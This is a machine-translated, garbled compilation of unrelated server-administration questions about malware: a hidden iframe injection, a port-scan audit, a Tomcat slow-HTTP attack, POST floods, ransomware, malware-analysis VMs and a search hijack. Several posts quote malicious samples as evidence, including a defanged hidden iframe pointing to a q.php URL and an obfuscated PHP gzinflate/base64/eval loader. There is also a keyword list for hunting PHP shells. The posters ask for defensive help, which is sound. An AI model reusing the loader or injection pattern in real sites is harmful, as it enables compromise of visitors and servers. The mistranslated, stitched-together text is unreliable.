编辑:进一步的信息/调查信息包含在这篇文章的评论 对这个模糊的标题表示歉意 – 总结这个问题有困难。 我最近发现,我的网站之一,在恶意软件的服务。 作为这个的结果,我已经grepped在httpdocs下的每个文件,并寻找任何可疑的东西,即调用shell_exec,eval,base64,passthru,包括,要求,cookiefunction在PHP文件。 我也经历了所有的JS文件寻找可疑的方法,另外,因为该网站的方面是从一个数据库build立我已经搜查了任何可疑的东西(使用phpmyadmin数据库searchfunction来寻找PHPshell等典型的JS恶意软件命令) 所有没有用,我根本找不到这是哪里。 因此,我已经重新加载了所运行的软件的所有文件,并有效地重新安装了站点文件。 我也有提供的软件经过检查,他们也没有find任何东西。 这让我得出的结论是,更高级别的东西,即Apache已经被攻破。 所以问题是我应该在这里检查? 我正在运行一个专门的服务器,只服务于这个网站,只有我有权访问(他说),所以我能够运行任何需要帮助诊断 恶意软件如何呈现? 间歇地将以下代码放入我的标签中: <style> .iqb71l { position:absolute; left:-1958px; top:-1826px} </style> <div class="iqb71l"><iframe src="hXXp://1.1.1.1/f72387bd1dfab35f89f1899e1be07c08/q.php" width="198" height="501"></iframe></div> 注意:在上面的代码示例中,我已将“http”更改为“hXXp”,将IP地址更改为“1.1.1.1” 但是,代码并不总是被注入,似乎是随机添加的。 另外,当代码确实出现时,IP地址跟在GUID和类名之后通常是不同的。 此外,没有任何恶意软件扫描仪(即谷歌网站pipe理员工具等等)正在采取这一点。 所以我猜测,这不仅仅是一个基本的注入,它是随机select何时呈现自己,它是dynamicselect一个地址注入,它似乎是恶意软件扫描器referrers隐形。 花了很多时间谷歌这一点,我一直没有find任何类似的情况下,但我已经find了很多网站pipe理员询问有关出现在他们的服务器上的一个不可思议的q.php文件引用。
今天在其中一台服务器上注意到,事件查看器/安全性有很多"Failure audit"消息,例如: 该消息每秒重复一次,端口号增加一个端口范围从1025到5000 ,然后再次。 对我来说,这样的“端口扫描”看起来相当可疑! 我试过运行TCPView来查找更多细节,但它只显示进程,ID和端口。 这是由spoolsv.exe这样devise的吗? 或者这是某种恶意软件? 有没有人看过这个? 文件服务器和打印服务器angular色安装在服务器上。
我正在使用Apache Tomcat 7在Linux上运行我的webapp。 我通过Acunetix扫描它,它告诉我,我的web应用程序容易受到“缓慢的HTTP拒绝服务攻击”。 我怎样才能保护它? Acunetix正在把我逼到这里 ,但是关于保护Apache而不是Tomcat。
数字海洋closures了我的水滴花花公子有交通液滴。 我做了一个新的滴(实例),我又面临同样的问题。 我的nginx access.log中充满了试图进行POST调用的随机IP地址。 最后我粘贴了一些。 为了防范,我使用fail2ban将这些IP地址列入黑名单。但是我需要知道问题的根源 这是因为系统内部是否存在恶意软件,或者是我没有任何控制权? 如果是因为有任何恶意软件包,那我该如何find它? 2.177.28.141 – – [27/Nov/2015:12:50:13 -0500] "POST / HTTP/1.1" 403 1358 "-" "Apache-HttpClient/UNAVAILABLE (java 1.5)" 5.238.77.154 – – [27/Nov/2015:12:50:33 -0500] "POST / HTTP/1.1" 403 1358 "-" "Apache-HttpClient/UNAVAILABLE (java 1.5)" 5.238.77.154 – – [27/Nov/2015:12:50:34 -0500] "POST / HTTP/1.1" 403 1358 "-" "Apache-HttpClient/UNAVAILABLE (java 1.5)" 2.187.214.241 – – [27/Nov/2015:12:51:11 -0500] […]
我已经在CentOS 7服务器上安装了Linux恶意软件检测和ClamAV,看起来没问题,因为它碰到了EICAR恶意软件testing文件 ,并且没有问题的定期扫描。 当我上传一个真实的恶意软件PHP文件时,问题就出现了,这个文件是我之前在一个旧的共享networking服务器上进行的攻击。 Maldet并不认为这是一个恶意文件。 我知道所有的AV可以错过一些威胁,但在这种情况下是一个非常明显的感染文件,国际海事组织。 //footer.php <?php function nBMj($NrG) { $NrG=gzinflate(base64_decode($NrG)); for($i=0;$i<strlen($NrG);$i++) { $NrG[$i] = chr(ord($NrG[$i])-1); } return $NrG; } eval(nBMj("Some_base64_encoded_text")); ?> 这是一个非常常见的WordPress的黑客,甚至没有可疑的function混淆。 来自Maldet开发者页面 : 特征 用于检测混淆威胁的统计分析组件(例如:base64) 清理规则删除base64和gzinflate(base64注入恶意软件 这是一个拥有10到20个网站的Web服务器,运行stream行的CMS,比如drupal和wordpress,所以绝大多数的攻击都会带有这种文件感染。 所以,这个问题:我错过了什么? 是否有任何特殊的configurationbase64 / gzinflate脚本或这是一个正常的行为? 也许Maldet w / ClamAv不是networking服务器的最佳工具?
Linux用户是否想要勒索勒索软件? 我不是在讨论像WINE一样使用Windows仿真。 我所有的服务器和办公桌面都在Linux上,我认为我至less对这个勒索软件是安全的。 但我只是想确定一下
我正在考虑针对我的Windows Azure托pipe虚拟机的快速恢复scheme的备份计划。 我的计划是创build一个附加到我的虚拟机的备份磁盘,并使用Windows Server Backup,使用Windows Server Backup在该磁盘上创build一个备份。 我认为这个磁盘通常对于勒索软件是不安全的,但是如果我在Windows Server Backup向导中select这个备份磁盘作为专用磁盘,情况也是如此吗? 因为那么磁盘将不再在文件资源pipe理器中可见,因此恶意软件无法访问? 其次,我想使用Azure恢复保险库创build第二个备份集。 如果我通过Azure-backup-agent将我的虚拟机连接到Vault,我的Vault-stored-data是否会受到勒索软件攻击? 谢谢!
我正在进行恶意软件研究,想知道构build安全虚拟机的最佳实践是如何在分解代码时包含代码。 至今: 每个用于检查代码的实例都位于一个单独的虚拟机中,只有主机的networking支持,以防止恶意代码从虚拟机中逃脱。 每个虚拟机都已完全打补丁,排除所有不必要的软件/服务,从而具有最小的攻击面。 我应该采取什么其他步骤来隔离虚拟机或硬化虚拟机? 虚拟机是Win XP和Win Vista。 谢谢
我很难过 我在台式电脑上遇到了一个病毒,它在IE和Firefox中都绑定了所有的search结果(Google,Yahoo!,Bing等),而且这两个帐号都发生在login到机器上,导致我离开基于用户帐户。 点击链接redirect到任意数量的随机网站。 Infomash似乎参与其中。 主机logging是好的,DNS服务器是好的(尝试了多个,相同的结果),Malwarebytes和AVG和HijcakThis报告什么都没有,把确切的URL地址或searchcaching结果在谷歌工作正常。 LSPfix发现没有问题,TDSSKiller什么都没发现,msconfig很好,\ Windows和\ System32文件夹基于最近的时间戳显示没有明显的坏道。 我运行的HitMan 3.5,它报告资源pipe理器和wininit.exe木马,但我犹豫删除这些核心文件(有原始时间戳,顺便说一句)。 Windows 7,我用尽了select。 冉IE没有附加组件,同样的问题。 我还没有尝试安全模式,但我相信这可以固定,而无需重新格式化。 任何经验或成功打击这个? 任何帮助将不胜感激,最好没有随机“自动病毒清除器! 程序,不告诉我他们find了什么,他们在做什么。 失意。
我们使用sunbelts VIPRE企业系统,几乎每个电脑都有这个东西被隔离。 有人熟悉addthis_widget.js。 它检测到它是一个trojan.js.redirector.bg ,我不知道这是否是一个误报,或者如果它实际上是一个威胁。 我尝试了几种不同的方法,但没有发现任何明确的。 有人对这个有经验么?